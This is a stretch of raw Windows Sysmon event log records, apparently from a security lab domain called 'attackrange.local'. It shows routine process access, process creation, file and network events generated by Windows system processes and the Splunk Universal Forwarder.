16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246607Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-52D2-6063-D022-00000000AF01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246606Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D2-6063-D022-00000000AF01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246605Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.882{CB4067E1-52D2-6063-D022-00000000AF01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246604Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.662{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E598B035F6B4EC5C57FF9F7E0CFB0E7,SHA256=26776DB1F891D21ED6ADCE8228D35E8F790222F7337FC8C3AAB90CC5314B6CB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246603Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.365{CB4067E1-52D2-6063-CF22-00000000AF01}9083336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000246602Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:20.614{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64827-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000246601Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D2-6063-CF22-00000000AF01}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246600Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246599Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246598Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246597Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246596Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246595Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246594Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246593Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246592Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246591Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-304A-6062-0500-00000000AF01}392508C:\Windows\system32\csrss.exe{CB4067E1-52D2-6063-CF22-00000000AF01}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246590Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.259{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D2-6063-CF22-00000000AF01}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246589Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.260{CB4067E1-52D2-6063-CF22-00000000AF01}908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246588Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.149{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3A73FCCB0AA1974594648CD8013A452,SHA256=B8256BC1DBA762B9C78EB7202B205269388748C61846CD6BAB09D4927372E5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061918Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:23.729{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AD2B75D75B417BFAD6013FAD14D2B63,SHA256=560ECCBF174D90C5347236EAF321010468CBB2AE5DC7D075B805761A3B213F47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246633Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.663{CB4067E1-52D3-6063-D122-00000000AF01}20283776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246632Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D3-6063-D122-00000000AF01}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246631Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246630Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246629Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246628Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246627Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:23.554{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246626Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 